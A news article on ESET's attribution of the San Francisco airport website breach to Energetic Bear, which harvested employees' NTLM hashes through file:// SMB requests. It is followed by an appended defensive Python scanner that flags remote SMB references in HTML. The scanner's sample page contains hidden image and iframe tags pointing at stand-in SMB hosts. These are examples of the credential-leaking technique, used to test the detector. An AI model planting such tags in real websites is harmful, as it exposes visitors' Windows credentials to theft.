Following an investigation by ESET researchers, the hackers behind the breach of San Francisco International Airport’s websites, reported last week, were determined to be Energetic Bear. This is claimed to be a Russian state-backed group, also known as DragonFly.
Researchers say that the actual intention of the hack was not to steal visitors’ credentials, but Windows credentials in the form of usernames and NTLM hashes. This was done by exploiting the SMB feature and the file:// prefix. The ultimate goal was to attain network-wide access by compromising an employee’s credentials.
From Energy to Aviation – Energetic Bear
San Francisco International Airport is the largest in the Bay Area, with international flights to tens of countries. The airport management reported a security breach on two of its subsidiary websites, SFOConnect and SFOConstruction. While the former is for employees, the latter is dedicated to construction contractors. The two were reported to have been breached on March 23 this year, but the airport disclosed the incident last week.
Now, analysis from ESET researchers reveals the hack was linked to a Russian state-backed group called Energetic Bear, or DragonFly. The group has been active since 2010 and has mostly preyed on energy companies. It has also been found expanding into the aviation and aerospace sectors lately. One indicator that led ESET researchers to link this breach to Energetic Bear was the intention of obtaining NTLM credentials.
Aiming for network sabotage?
The hack, which the airport previously reported as an attempt to steal visitors’ credentials, was actually aimed at stealing employees’ Windows credentials in the form of usernames and NTLM hashes. This was done by exploiting the SMB feature and the file:// prefix of Internet Explorer. The final goal is to crack the NTLM hashes and obtain cleartext passwords; gaining access to the airport’s internal network would then enable the hacker to spread into other areas and completely sabotage the network.
As of now, the airport has said that it is removing the malicious code detected on those two websites and even force-resetting passwords on the network. Further, it has suggested that those who have recently logged into those two websites change their passwords as a precaution.
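A defender-side check for the file:// technique described above, as an added example that is not part of the original article or ESET's analysis: it scans page markup for resource attributes that point at a remote SMB host through a file:// URL or a UNC path. The attribute list, function names and sample HTML are constructed for illustration.

```python
from html.parser import HTMLParser

# Attributes that make a browser fetch a resource (illustrative list, an assumption).
URL_ATTRS = {"src", "href", "data", "poster", "background", "action"}

def remote_smb_host(value):
    """Return the remote host a file:// URL or UNC path points at, else None."""
    v = value.strip()
    if v.startswith("\\\\"):                     # UNC form: \\host\share\...
        host = v[2:].split("\\", 1)[0]
    elif v.lower().startswith("file:"):
        path = v[5:].replace("\\", "/")
        rest = path.lstrip("/")
        slashes = len(path) - len(rest)
        # file://host/share (2 slashes) and file:////host/share (4+) name a
        # remote host; file:///C:/x and file:/x are local paths.
        if slashes != 2 and slashes < 4:
            return None
        host = rest.split("/", 1)[0]
    else:
        return None
    return host if host and host.lower() != "localhost" else None

class SmbRefFinder(HTMLParser):
    """Collects (line, tag, attribute, host) for every remote SMB reference."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value and (host := remote_smb_host(value)):
                self.findings.append((self.getpos()[0], tag, name, host))

def scan_html(html):
    finder = SmbRefFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page: documentation-range IP and example domains.
SAMPLE = r"""<html><body>
<img src="/static/logo.png">
<img src="file://203.0.113.7/icons/pixel.png" width="1" height="1">
<script src="//cdn.example.org/app.js"></script>
<a href="file:///C:/Users/Public/readme.txt">local doc</a>
<iframe src="\\files.example.net\share\x.html"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, tag, attr, host in scan_html(SAMPLE):
        print(f"line {line}: <{tag} {attr}> loads from SMB host {host}")
```

A hit means a Windows client rendering the page may attempt SMB authentication to that host; blocking outbound TCP 445 at the network edge limits that exposure regardless of page content.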